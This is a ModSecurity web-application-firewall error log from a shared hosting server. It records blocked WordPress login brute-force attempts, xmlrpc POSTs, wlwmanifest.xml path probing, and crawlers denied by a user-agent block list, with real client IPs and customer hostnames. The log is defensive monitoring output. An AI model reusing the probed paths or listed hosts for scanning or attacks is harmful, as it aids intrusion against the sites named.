[Tue May 26 18:54:49.499436 2026] [security2:error] [pid 1036960:tid 1037133] [client 35.247.61.84:61665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.61.247.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/xmlrpc.php"] [unique_id "ahWfIYGNKXNii6nttH9kfgAAALA"]
[Tue May 26 18:54:49.499580 2026] [security2:error] [pid 1036960:tid 1037133] [client 35.247.61.84:61665] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thedebateafrica.org"] [uri "/xmlrpc.php"] [unique_id "ahWfIYGNKXNii6nttH9kfgAAALA"]
[Tue May 26 18:54:49.806983 2026] [security2:error] [pid 1036960:tid 1037116] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfIYGNKXNii6nttH9khAAAAJ8"]
[Tue May 26 18:54:51.546985 2026] [security2:error] [pid 1036960:tid 1037095] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfI4GNKXNii6nttH9kswAAAIo"]
[Tue May 26 18:54:53.641394 2026] [security2:error] [pid 1036960:tid 1036970] [remote 54.38.29.86:44906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfJYGNKXNii6nttH9k6AAAywk"]
[Tue May 26 18:54:53.754324 2026] [security2:error] [pid 1036960:tid 1037126] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfJYGNKXNii6nttH9k5AAAAKk"]
[Tue May 26 18:54:54.884819 2026] [security2:error] [pid 1036960:tid 1036985] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfJoGNKXNii6nttH9lEQAAhhg"]
[Tue May 26 18:54:54.885016 2026] [security2:error] [pid 1036960:tid 1037091] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfJoGNKXNii6nttH9lEQAAhhg"]
[Tue May 26 18:54:56.706958 2026] [security2:error] [pid 1036960:tid 1037159] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfKIGNKXNii6nttH9lLAAAAMo"]
[Tue May 26 18:54:58.063407 2026] [security2:error] [pid 1036960:tid 1037086] [remote 31.24.155.180:54280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfKYGNKXNii6nttH9lVwAAuX0"]
[Tue May 26 18:54:58.354877 2026] [security2:error] [pid 1036960:tid 1036986] [remote 31.24.155.180:54280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfKoGNKXNii6nttH9laQAA7hk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:54:58.381270 2026] [security2:error] [pid 1036960:tid 1037182] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfKYGNKXNii6nttH9lXQAAAOE"]
[Tue May 26 18:55:01.117199 2026] [security2:error] [pid 1036960:tid 1037153] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWfK4GNKXNii6nttH9liQAAAMQ"]
[Tue May 26 18:55:01.309111 2026] [security2:error] [pid 1036960:tid 1037214] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfLIGNKXNii6nttH9lpwAAAQE"]
[Tue May 26 18:55:01.552767 2026] [security2:error] [pid 1036960:tid 1037138] [client 223.109.252.185:46760] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahWfLYGNKXNii6nttH9lxAAAALU"]
[Tue May 26 18:55:01.552867 2026] [security2:error] [pid 1036960:tid 1037138] [client 223.109.252.185:46760] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahWfLYGNKXNii6nttH9lxAAAALU"]
[Tue May 26 18:55:02.241766 2026] [security2:error] [pid 1036960:tid 1037201] [client 107.170.66.128:56831] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWfLoGNKXNii6nttH9l0gAAAPQ"]
[Tue May 26 18:55:03.533076 2026] [security2:error] [pid 1036960:tid 1037022] [remote 162.214.206.32:51406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfL4GNKXNii6nttH9l-gAAlj0"]
[Tue May 26 18:55:03.632877 2026] [security2:error] [pid 1036960:tid 1037134] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfL4GNKXNii6nttH9l8wAAALE"]
[Tue May 26 18:55:03.696857 2026] [security2:error] [pid 1036960:tid 1037017] [remote 162.214.206.32:51406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfL4GNKXNii6nttH9mAAAAuzg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:55:04.622814 2026] [security2:error] [pid 1036960:tid 1037093] [client 67.1.192.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfMIGNKXNii6nttH9mEAAAAIg"]
[Tue May 26 18:55:05.423503 2026] [security2:error] [pid 1036960:tid 1037104] [client 89.221.204.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfMYGNKXNii6nttH9mKwAAAJM"], referer: https://www.anujtradingco.com/
[Tue May 26 18:55:05.428815 2026] [security2:error] [pid 1036960:tid 1037140] [client 107.170.66.128:56900] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWfMYGNKXNii6nttH9mLAAAALc"]
[Tue May 26 18:55:05.529637 2026] [security2:error] [pid 1036960:tid 1037007] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfMYGNKXNii6nttH9mLgAAzS4"]
[Tue May 26 18:55:05.529796 2026] [security2:error] [pid 1036960:tid 1037162] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfMYGNKXNii6nttH9mLgAAzS4"]
[Tue May 26 18:55:05.950456 2026] [security2:error] [pid 1036960:tid 1037190] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfMYGNKXNii6nttH9mMwAAAOk"]
[Tue May 26 18:55:06.801594 2026] [security2:error] [pid 1036960:tid 1037177] [client 89.221.204.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfMoGNKXNii6nttH9mUwAAANw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 18:55:07.720474 2026] [security2:error] [pid 1036960:tid 1037114] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfM4GNKXNii6nttH9mYwAAAJ0"]
[Tue May 26 18:55:08.166393 2026] [security2:error] [pid 1036960:tid 1036998] [remote 121.200.216.55:55020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWfM4GNKXNii6nttH9meQAAxiU"]
[Tue May 26 18:55:09.765229 2026] [security2:error] [pid 1036960:tid 1037160] [client 66.249.64.168:60505] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWfNIGNKXNii6nttH9miwAAAMs"], referer: http://doyecpa.com/prizes/24745985
[Tue May 26 18:55:10.669256 2026] [security2:error] [pid 1036960:tid 1037154] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfNoGNKXNii6nttH9mvAAAAMU"]
[Tue May 26 18:55:11.115977 2026] [security2:error] [pid 1036960:tid 1037180] [client 35.247.102.154:52582] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "azurmediatec.com"] [uri "/index.php"] [unique_id "ahWfN4GNKXNii6nttH9m1gAAAN8"]
[Tue May 26 18:55:11.125581 2026] [security2:error] [pid 1036960:tid 1037173] [client 114.119.159.16:56563] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/chocolate-colombia/"] [unique_id "ahWfN4GNKXNii6nttH9m2gAAANg"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 18:55:11.464163 2026] [security2:error] [pid 1036960:tid 1037140] [client 89.221.204.135:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfN4GNKXNii6nttH9m3wAAALc"], referer: https://anujtradingco.com
[Tue May 26 18:55:11.878233 2026] [security2:error] [pid 1036960:tid 1037135] [client 35.247.102.154:59839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.102.247.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/xmlrpc.php"] [unique_id "ahWfN4GNKXNii6nttH9m5wAAALI"]
[Tue May 26 18:55:12.334997 2026] [security2:error] [pid 1036960:tid 1037113] [client 35.247.102.154:57127] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOIGNKXNii6nttH9m-QAAAJw"]
[Tue May 26 18:55:12.595792 2026] [security2:error] [pid 1036960:tid 1037122] [client 35.247.102.154:64513] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOIGNKXNii6nttH9nBQAAAKU"]
[Tue May 26 18:55:12.850575 2026] [security2:error] [pid 1036960:tid 1037127] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfOIGNKXNii6nttH9nBAAAAKo"]
[Tue May 26 18:55:12.907723 2026] [security2:error] [pid 1036960:tid 1037092] [client 35.247.102.154:60038] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOIGNKXNii6nttH9nFAAAAIc"]
[Tue May 26 18:55:13.032821 2026] [security2:error] [pid 1036960:tid 1037197] [client 203.189.134.85:51802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.134.189.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/xmlrpc.php"] [unique_id "ahWfOIGNKXNii6nttH9nBgAAAPA"]
[Tue May 26 18:55:13.032938 2026] [security2:error] [pid 1036960:tid 1037197] [client 203.189.134.85:51802] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rohiniventures.com"] [uri "/xmlrpc.php"] [unique_id "ahWfOIGNKXNii6nttH9nBgAAAPA"]
[Tue May 26 18:55:13.142966 2026] [security2:error] [pid 1036960:tid 1037114] [client 35.247.102.154:50778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOYGNKXNii6nttH9nHAAAAJ0"]
[Tue May 26 18:55:13.415067 2026] [security2:error] [pid 1036960:tid 1037094] [client 35.247.102.154:65347] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOYGNKXNii6nttH9nJgAAAIk"]
[Tue May 26 18:55:13.637561 2026] [security2:error] [pid 1036960:tid 1037178] [client 34.90.199.112:49152] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "shahvishaal.moes-art.com"] [uri "/"] [unique_id "ahWfOYGNKXNii6nttH9nLAAAAN0"]
[Tue May 26 18:55:13.637711 2026] [security2:error] [pid 1036960:tid 1037178] [client 34.90.199.112:49152] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "shahvishaal.moes-art.com"] [uri "/"] [unique_id "ahWfOYGNKXNii6nttH9nLAAAAN0"]
[Tue May 26 18:55:13.757109 2026] [security2:error] [pid 1036960:tid 1037168] [client 35.247.102.154:56711] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOYGNKXNii6nttH9nMAAAANM"]
[Tue May 26 18:55:14.112564 2026] [security2:error] [pid 1036960:tid 1037111] [client 35.247.102.154:55199] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOoGNKXNii6nttH9nNwAAAJo"]
[Tue May 26 18:55:14.410268 2026] [security2:error] [pid 1036960:tid 1037207] [client 35.247.102.154:56872] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOoGNKXNii6nttH9nRwAAAPo"]
[Tue May 26 18:55:14.684703 2026] [security2:error] [pid 1036960:tid 1037128] [client 35.247.102.154:53896] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOoGNKXNii6nttH9nVQAAAKs"]
[Tue May 26 18:55:14.911323 2026] [security2:error] [pid 1036960:tid 1037169] [client 35.247.102.154:56091] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "azurmediatec.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWfOoGNKXNii6nttH9nXwAAANQ"]
[Tue May 26 18:55:15.136486 2026] [security2:error] [pid 1036960:tid 1037142] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfOoGNKXNii6nttH9nWwAAALk"]
[Tue May 26 18:55:16.176474 2026] [security2:error] [pid 1036960:tid 1037057] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfPIGNKXNii6nttH9nggAAtmA"]
[Tue May 26 18:55:16.176666 2026] [security2:error] [pid 1036960:tid 1037139] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfPIGNKXNii6nttH9nggAAtmA"]
[Tue May 26 18:55:16.935191 2026] [security2:error] [pid 1036960:tid 1037163] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfPIGNKXNii6nttH9njgAAAM4"]
[Tue May 26 18:55:17.221243 2026] [security2:error] [pid 1036960:tid 1037166] [client 104.28.68.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWfPYGNKXNii6nttH9noQAAANE"]
[Tue May 26 18:55:19.458263 2026] [security2:error] [pid 1036960:tid 1037129] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfP4GNKXNii6nttH9n4QAAAKw"]
[Tue May 26 18:55:19.870996 2026] [security2:error] [pid 1036960:tid 1037187] [client 185.191.171.17:37526] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/tie-dye/month/"] [unique_id "ahWfP4GNKXNii6nttH9n-QAAAOY"]
[Tue May 26 18:55:19.871082 2026] [security2:error] [pid 1036960:tid 1037187] [client 185.191.171.17:37526] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/tie-dye/month/"] [unique_id "ahWfP4GNKXNii6nttH9n-QAAAOY"]
[Tue May 26 18:55:21.686197 2026] [security2:error] [pid 1036960:tid 1037104] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfQYGNKXNii6nttH9oJQAAAJM"]
[Tue May 26 18:55:24.423701 2026] [security2:error] [pid 1036960:tid 1037177] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfQ4GNKXNii6nttH9ocgAAANw"]
[Tue May 26 18:55:25.552527 2026] [security2:error] [pid 1036960:tid 1037001] [remote 54.38.29.86:45230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWfRYGNKXNii6nttH9okgAAqyg"]
[Tue May 26 18:55:26.250229 2026] [security2:error] [pid 1036960:tid 1037095] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfRYGNKXNii6nttH9oogAAAIo"]
[Tue May 26 18:55:26.334727 2026] [security2:error] [pid 1036960:tid 1036999] [remote 14.161.17.36:36976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWfRoGNKXNii6nttH9orwAA0SY"]
